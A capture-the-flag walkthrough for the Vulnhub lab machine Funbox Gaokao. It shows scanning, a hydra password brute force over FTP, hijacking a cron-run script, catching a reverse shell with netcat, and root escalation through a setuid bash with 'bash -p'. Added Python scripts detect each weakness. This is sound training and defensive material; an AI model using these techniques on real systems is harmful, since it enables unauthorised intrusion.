Funbox Gaokao Walkthrough – Vulnhub – Writeup


Funbox Gaokao is a machine that the author intended for beginners. It needs a bit of brute force and some knowledge of the FTP protocol.

Link to the machine: https://www.vulnhub.com/entry/funbox-gaokao,707/

Twitter handle of the author: https://twitter.com/@0815R2d2


Identify the target

The first step while working with the vulnhub challenges is to discover the IP address of the target machine.

sudo netdiscover -i eth0 -r 10.0.2.0/24

Scan open ports

Then, I scanned the open ports to identify the exposed services on the target.

sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.32

The scan shows an FTP server that allows anonymous access, an SSH server, a web server and a MySQL server.

Enumerate FTP server

Since we have anonymous access to the FTP server, I started there. The default ftp client isn't very convenient, so I switch to lftp later on.

ftp 10.0.2.32

The server banner gives us a potential user of the machine. It also gives us the hostname, which has no significance for this walkthrough. Hence, I started brute-forcing that user's password.

hydra -V -l sky -P /home/kali/rockyou.txt 10.0.2.32 ftp

As you can see, we got the password for the user sky and hence I logged in.
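It is worth knowing what this brute force looks like from the server side. The following Python script is an added example, not part of the original writeup: it parses log lines in the shape vsftpd writes to its log (the sample lines are constructed, since the page never shows the target's log, and the exact format is an assumption) and flags a client that fails repeatedly against one account and then succeeds shortly after, which is exactly the trail hydra leaves behind. It also lists clients that authenticated as anonymous, the first foothold on this box.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines modelled on vsftpd's log format (assumption: the
# original page never shows the server's log).
SAMPLE_LOG = """\
Sat Jan  1 12:00:01 2022 [pid 2101] CONNECT: Client "10.0.2.15"
Sat Jan  1 12:00:01 2022 [pid 2100] [anonymous] OK LOGIN: Client "10.0.2.15"
Sat Jan  1 12:00:05 2022 [pid 2103] [sky] FAIL LOGIN: Client "10.0.2.15"
Sat Jan  1 12:00:05 2022 [pid 2105] [sky] FAIL LOGIN: Client "10.0.2.15"
Sat Jan  1 12:00:06 2022 [pid 2107] [sky] FAIL LOGIN: Client "10.0.2.15"
Sat Jan  1 12:00:06 2022 [pid 2109] [sky] FAIL LOGIN: Client "10.0.2.15"
Sat Jan  1 12:00:07 2022 [pid 2111] [sky] FAIL LOGIN: Client "10.0.2.15"
Sat Jan  1 12:00:07 2022 [pid 2113] [sky] OK LOGIN: Client "10.0.2.15"
Sat Jan  1 12:30:00 2022 [pid 2201] [sky] OK LOGIN: Client "10.0.2.7"
Sat Jan  1 12:31:00 2022 [pid 2203] [lucy] FAIL LOGIN: Client "10.0.2.7"
"""

# Only login results are interesting; CONNECT lines do not match and are skipped.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"$'
)


def parse_logins(text):
    """Return (timestamp, client, user, result) tuples for every login attempt."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Collapse the padded day-of-month ("Jan  1") before parsing the timestamp.
        ts = datetime.strptime(' '.join(m['ts'].split()), '%a %b %d %H:%M:%S %Y')
        events.append((ts, m['client'], m['user'], m['result']))
    return events


def anonymous_logins(events):
    """Clients that successfully authenticated as 'anonymous'."""
    return sorted({c for _, c, user, result in events
                   if user == 'anonymous' and result == 'OK'})


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """One finding per (client, user) that reaches `threshold` failures inside any
    `window_seconds` span; 'cracked' is set when a success follows the burst."""
    findings = {}
    recent = defaultdict(list)  # (client, user) -> timestamps of recent failures
    for ts, client, user, result in sorted(events):
        key = (client, user)
        # Drop failures that have fallen out of the sliding window.
        recent[key] = [t for t in recent[key]
                       if (ts - t).total_seconds() <= window_seconds]
        if result == 'FAIL':
            recent[key].append(ts)
            if len(recent[key]) >= threshold:
                f = findings.setdefault(key, {'client': client, 'user': user,
                                              'failures': 0, 'cracked': False})
                f['failures'] = max(f['failures'], len(recent[key]))
        elif key in findings and recent[key]:
            # A success right after a burst of failures: the password was found.
            findings[key]['cracked'] = True
    return list(findings.values())


if __name__ == '__main__':
    evs = parse_logins(SAMPLE_LOG)
    print('anonymous logins from:', anonymous_logins(evs))
    for f in detect_bruteforce(evs):
        print(f"{f['client']} -> {f['user']}: {f['failures']} failures, "
              f"cracked={f['cracked']}")
```

The useful signal for a SOC is the combination: a burst of failures against a single account followed immediately by a success from the same client. On a real host the same logic can run over `/var/log/vsftpd.log` with the sample text swapped for the file contents, and the fix for the root cause is rate limiting or fail2ban on the FTP service plus a password for sky that is not in rockyou.txt.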

ftp 10.0.2.32

ls -al
pwd

You can see that this is the /home/sky directory of the target machine. Hence, I moved up one directory to list the other users and found two more: lucy and sarah. I then brute-forced the password of sarah, which succeeded but turned out to be a rabbit hole. There is another rabbit hole: sky's password also logs in to the MySQL server.

Moving forward, there is a file called user.flag with the following content. Here I am using the lftp client, because it makes life easier.

lftp -u sky,_pass_ 10.0.2.32

ls -al
cat user.flag

I got a hint from the user @D4rw1n from Vulnhub discord channel.

We can see that the flag file is a shell script and that it is executable by the user sarah. Hence, we might guess that a cron job run by sarah executes it. Thus, I downloaded the file to my local machine, updated the script and uploaded it back to the FTP server.

get user.flag
# update the script
put user.flag
ls -al

You can see that the permissions are intact. If you did mess up the permissions somehow, note that the FTP server has SITE commands enabled.

Using those SITE commands, we can run the corresponding commands (such as changing file permissions) on the server directly from the FTP client.
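The root cause here is a cron job that executes a file another user can modify. The Python audit below is an added example and not the author's code: it parses /etc/crontab-style lines, looks at every absolute path in each job's command, and reports scripts owned by someone other than the job's user (or root) as well as scripts writable by group or others. The crontab lines, the paths /usr/local/bin/backup.sh and /opt/scripts/rotate.sh, and the metadata table are constructed stand-ins for the target, since the page only infers the job from the flag file's permissions; live_lookup is the os.stat-based resolution you would use on a real host.

```python
import os
import pwd
import stat

# Constructed /etc/crontab-style lines (assumption: the page never shows the
# real crontab; sarah running /home/sky/user.flag is what the writeup infers).
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
*/1 * * * * sarah /home/sky/user.flag
0 3 * * *   root  /usr/local/bin/backup.sh
*/5 * * * * root  /bin/bash /opt/scripts/rotate.sh
"""

# Constructed metadata standing in for os.stat/pwd on the target:
# path -> (owner name, permission bits). rotate.sh is deliberately 0777.
SAMPLE_FS = {
    '/home/sky/user.flag': ('sky', 0o755),
    '/usr/local/bin/backup.sh': ('root', 0o755),
    '/bin/bash': ('root', 0o755),
    '/opt/scripts/rotate.sh': ('root', 0o777),
}


def table_lookup(table):
    """Lookup function backed by a constructed table (for offline demonstration)."""
    def lookup(path):
        return table.get(path)
    return lookup


def live_lookup(path):
    """Lookup function for a real host: (owner name, permission bits) or None."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode)


def parse_crontab(text):
    """Return (user, command) pairs from system crontab lines (7 fields)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        fields = line.split(None, 6)  # 5 time fields, user, rest = command
        if len(fields) < 7:
            continue
        jobs.append((fields[5], fields[6]))
    return jobs


def audit_jobs(jobs, lookup):
    """Flag every absolute path in a job that a user other than the job's
    owner could change: wrong owner, or group/world writable."""
    findings = []
    for user, command in jobs:
        for token in command.split():
            if not token.startswith('/'):
                continue
            info = lookup(token)
            if info is None:
                continue
            owner, mode = info
            if owner not in (user, 'root'):
                findings.append(
                    f"{token}: owned by {owner} but executed by cron as {user}")
            if mode & 0o022:
                findings.append(
                    f"{token}: group/world writable (mode {mode:04o})")
    return findings


if __name__ == '__main__':
    for finding in audit_jobs(parse_crontab(SAMPLE_CRONTAB), table_lookup(SAMPLE_FS)):
        print(finding)
```

Run against a real system by reading /etc/crontab and the files under /etc/cron.d and passing live_lookup instead of the table. The first finding it produces for the sample is the Funbox situation exactly: sarah's job runs a file sky owns, so whoever holds sky's credentials decides what sarah executes. The fix is to have the job run a script owned by the job's user or root, with mode 0755 or tighter, from a directory that other users cannot write to.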

Meanwhile, I also listened on the port 4444.

nc -nlvp 4444

After a while, I got the reverse shell.

Then, I proceeded with upgrading the shell. Check the following post on how to do that.

Upgrade to an intelligent reverse shell

However, since the Python method didn't give me a PTY shell, I used the following method instead.

SHELL=/bin/bash script -q /dev/null

Next, when I searched for setuid binaries, I found that bash has the setuid bit set.

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

This means we can escalate privileges by running bash with the -p flag, which keeps the effective user ID.

Reference: https://gtfobins.github.io/gtfobins/bash/
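From the defender's side, the find command above makes a good periodic audit as well. The following Python script is an added example, not code from the page: it parses the `ls -al` lines that command prints (the sample lines are constructed, with placeholder sizes and dates) and classifies each setuid file as an expected system binary, a shell or interpreter that hands a root shell to any local user (the GTFOBins case referenced above), or an unknown file to review. The baseline set is a short assumption for a Debian-style system, not a complete list.

```python
import os
import re

# Constructed sample of what `find / -perm -4000 -exec ls -al {} \;` prints;
# sizes and dates are placeholders, not values from the target machine.
SAMPLE_FIND_OUTPUT = """\
-rwsr-xr-x 1 root root 1183448 Jun 18  2020 /bin/bash
-rwsr-xr-x 1 root root   43088 Sep 16  2020 /bin/mount
-rwsr-xr-x 1 root root   68208 May 28  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root  166056 Jan 19  2021 /usr/bin/sudo
-rwsr-sr-x 1 root root   17312 Jun 18  2020 /usr/local/bin/helper
"""

# A setuid bit on any shell or interpreter is a root shell for every local user.
INTERPRETERS = {'bash', 'sh', 'dash', 'zsh', 'ksh', 'python', 'python3',
                'perl', 'ruby', 'php'}

# Setuid binaries that ship that way on a typical Debian/Ubuntu install
# (assumed baseline; derive the real one from your distribution's packages).
BASELINE = {'/usr/bin/passwd', '/usr/bin/sudo', '/usr/bin/su', '/bin/su',
            '/bin/mount', '/bin/umount', '/usr/bin/chsh', '/usr/bin/chfn',
            '/usr/bin/gpasswd', '/usr/bin/newgrp', '/bin/ping'}

# mode  links owner group size  month day year  path
LS_RE = re.compile(
    r'^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+'
    r'\S+\s+\S+\s+\S+\s+(?P<path>/\S+)$'
)


def parse_find_ls(text):
    """Turn `ls -al` lines into dicts with path, owner and setuid/setgid flags."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if not m:
            continue
        mode = m['mode']
        # Position 3 is the owner execute slot: 's' or 'S' means setuid is set;
        # position 6 is the group execute slot, 's'/'S' means setgid.
        entries.append({'path': m['path'], 'owner': m['owner'],
                        'setuid': mode[3] in 'sS', 'setgid': mode[6] in 'sS'})
    return entries


def classify_setuid(entries):
    """Map each setuid path to 'critical', 'expected' or 'review'."""
    result = {}
    for e in entries:
        if not e['setuid']:
            continue
        name = os.path.basename(e['path'])
        if name in INTERPRETERS:
            result[e['path']] = 'critical'
        elif e['path'] in BASELINE:
            result[e['path']] = 'expected'
        else:
            result[e['path']] = 'review'
    return result


if __name__ == '__main__':
    for path, label in classify_setuid(parse_find_ls(SAMPLE_FIND_OUTPUT)).items():
        print(f'{label:9} {path}')
```

On a real host, pipe the find command's output into parse_find_ls. Anything labelled critical should be fixed immediately with chmod u-s on the binary, and the review bucket is where a dropped backdoor or a forgotten custom helper will show up, so compare it against the package manifests rather than waving it through.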

bash -p
whoami
cd /root
ls -al
cat root.flag